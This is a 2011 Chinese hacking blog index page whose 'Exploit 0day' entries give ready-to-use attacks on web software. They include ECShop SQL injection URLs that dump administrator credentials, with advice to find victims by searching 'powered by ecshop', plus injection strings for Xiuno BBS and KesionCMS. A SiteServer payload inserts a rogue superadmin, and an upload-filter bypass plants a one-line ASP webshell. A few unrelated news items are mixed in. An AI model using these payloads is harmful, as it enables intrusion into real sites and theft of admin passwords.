31 十二 2011
by Scriptin Exploit 0day Tags: Ecshop漏洞, 一分钟拿站
而这个漏洞呢,暂时是可以说是通杀ecshop的。 如果你没有目标网站,可以google上搜索:powered by ecshop 就可以找到一大堆ecshop的网站 这个时候在其网址后输入病毒代码即可以爆出该站的管理员账户密码 普通代码:”user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*” 而有些网站会针对这个问题作出些修复等等,所以这个普通代码的成功率现在已经不是那么高了.如果普通代码不行,不着急,还有个变种代码 变种代码:”search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319″ 之后就可以爆出该网的账户密码
【More>>】
25 十一 2011
by Scriptin Exploit 0day Tags: bbs 搜索型, SCRIPT, 修罗(Xiuno 1.0.2), 注入漏洞
漏洞作者:lostwolf 漏洞类型: SQL注射 漏洞描述:当magic_quotes_gpc = Off时,产生搜索型注入漏洞(POST) 获取用户个数 1 ‘ AND (SELECT 1600 FROM(SELECT COUNT(*),CONCAT(0x6c6f7374776f6c667e,(SELECT MID((IFNULL(CAST(COUNT(*) AS CHAR),0×20)),1,50) FROM www_userfield),0x7e7430306c73,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘lost’=’lost 获取用户名: 1 ‘ AND (SELECT 3849 FROM(SELECT COUNT(*),CONCAT(0x6c6f7374776f6c667e,(SELECT MID((IFNULL(CAST(username AS CHAR),0×20)),1,50) FROM www_userfield LIMIT 0,1),0x7e7430306c73,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘lost’=’lost 获取密码: 1 ‘ AND (SELECT 7750 FROM(SELECT [...]
【More>>】
16 十一 2011
by Scriptin 娱乐八卦 Tags: SCRIPT, 河马拉屎, 霸气外漏
【More>>】
16 十一 2011
by Scriptin 关注社会 Tags: SCRIPT, 女子夺枪, 拒绝冷漠, 擒歹徒
【More>>】
15 十一 2011
by Scriptin Exploit 0day Tags: PhpMyadmin, SCRIPT, 任意文件, 读取漏洞
################################################## # # Title: PhpMyadmin任意文件读取漏洞 # Time:2011-11-02 # Team:80sec # Author: 80sec ################################################### PhpMyadmin实现中错误的使用了simplexml_load_string函数用于xml解析,但是该函数中默认并没有处理好外部实体的安全性,导致用户可以借助xml文件读取和访问应用有权限访问的系统和网络资源 libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It’s basically a freebee. */ $xml = [...]
【More>>】
31 十 2011
by Scriptin Exploit 0day Tags: SiteServer, 导致SQL注入, 逻辑漏洞
by: 蓝孩 0×01 简介siteserver: 本文测试的版本是: SiteServer系列产品 最新版本: 3.4.4 正式版 (2011年7月18日发布) 下载地址:http://www.siteserver.cn/download 客户案例: http://www.siteserver.cn/customer 也百度了一下,发现客户数量还是不少的。 0×02: 漏洞描述: 问题出在UserCenter.Pages.DLL中的Register,注册流程逻辑有问题,具体如下: 1.程序先把用户名带入数据库中查询,如果用户名没有重复,进入第二步; 2.再在远程检测用户名中是否含有非法字符,如果没有,则进入第三步; 3.将新注册的用户插入数据库。 由于在进行第一步的时候,程序没有进行任何处理就带入数据库中查询,那么就可以xxoo了。 Orz。。。。 Example: http://xxx.xxx.xxx/UserCenter/register.aspx 用户名填入以下语句,其他地方正常填写。 123′);ins ert in to bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,’VffSUZcBPo4=’,’Encrypted’,’i7jq4LwC25wKDoqHErBWaw==’);ins ert in to bairong_AdministratorsInRoles values(‘Administrator’,’blue’);ins ert in to bairong_AdministratorsInRoles values(‘RegisteredUser’,’blue’);ins ert in to bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,’blue’);– 提交注册之后就往库里面插入了一个用户名为:blue 密码为:lanhai 的超级用户。 默认后台地址为:http://xxx.xxx.xxx/siteserver 0×03 后台到webshell: 拿webshell或者直接提权是一个仁者见仁智者见智的活,各家有各家的方法,我大概看了一下,有3种方法- 一、 站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx [...]
【More>>】
31 十 2011
by Scriptin 技术安全 Tags: asa, aspx, cdx, cer, php, 突破
今天日一站 发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载 尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章 过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去, 脚本内容如下: http://www.92hack.net/ashx.txt 然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了! 密码为root,果断菜刀连之 没有最牛逼的方法,只有最爱思想的脑子 by:狗一样的男人
【More>>】
22 十 2011
by Scriptin Exploit 0day Tags: SCRIPT, 注射漏洞, 科讯CMS
EXP: http://XXX.XXX.XXX/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
【More>>】
22 十 2011
by Scriptin 关注社会 Tags: SCRIPT, 奥巴马, 宣布年内, 撤出全部, 驻伊美军
10月21日,美国总统奥巴马在首都华盛顿白宫宣布,美军将在今年年底前全部撤离伊拉克。新华社记者张军摄 新华网华盛顿10月21日电(记者 杜静 王丰丰)美国总统奥巴马21日宣布,美军将在今年年底前全部撤离伊拉克。 奥巴马宣布年底前撤离全部驻伊美军 奥巴马当天在与伊拉克总理马利基举行视频会议后宣布这一决定。他在白宫发表声明说,美军将在今年年底前全部撤离伊拉克,从而结束这场持续近9年的战争。 奥巴马说,美军撤离后,美伊两国关系将成为主权国家之间的正常双边关系,两国将在共同利益和相互尊重的基础上建立稳固、长期的伙伴关系。他同时表示邀请马利基今年12月访美。 美军现阶段在伊拉克驻军大约4万人。根据美国与伊拉克在2008年达成的驻军地位协定,美军将于2011年底前全部撤离伊拉克。近期以来,美伊双方一直在就延长驻军时限展开谈判。美方希望部分驻军在明年以军事顾问的形式继续驻扎伊拉克,帮助培训伊拉克安全部队。但据美国媒体报道,由于伊方拒绝给予驻伊美军法律豁免权,双方有关延长驻军时限的谈判最终破裂。 2003年3月伊拉克战争爆发后,美军开始进驻伊拉克。2010年8月底,美国从伊拉克撤离大部分军队,结束作战任务,留下3.5万至5万兵力,负责支持伊拉克政府及其安全部队的军事行动。 旷日持久的伊拉克战争令美国付出巨大代价,累计超过4400名美军士兵在伊拉克死亡。奥巴马在竞选总统期间就承诺,将以负责任的方式尽快结束伊拉克战争。特别是近年来,随着美国经济持续低迷、国库空虚,民众反战情绪不断高涨,越来越多的人要求尽快结束伊拉克和阿富汗战争。
【More>>】
21 十 2011
by Scriptin Exploit 0day Tags: 0day, SCRIPT, shopex, 密码取回处, 新生成密码, 漏洞
简要描述: shopex在找回密码的地方存在一些逻辑设计问题,导致可以预测新生成的密码,可能被用来攻击获取他人密码 详细说明: 相关代码 /core/shop/controller/ctl.passport.php中: function sendPSW(){ $this->begin($this->system->mkUrl(‘passport’,’lost’)); $member=&$this->system->loadModel(‘member/member’); $data=$member->getMemberByUser($_POST['uname']); if(($data['pw_answer']!=$_POST['pw_answer']) || ($data['email']!=$_POST['email'])){ $this->end(false,__(‘问题回答错误或当前账户的邮箱填写错误’),$this->system->mkUrl(‘passport’,’lost’)); } if( $data['member_id'] < 1 ){ $this->end(false,__(‘会员信息错误’),$this->system->mkUrl(‘passport’,’lost’)); } $messenger = &$this->system->loadModel(‘system/messenger’);echo microtime().”“; $passwd = substr(md5(print_r(microtime(),true)),0,6); 修复方案: 完全随机
【More>>】
Previous Older Entries
RSS
最新回复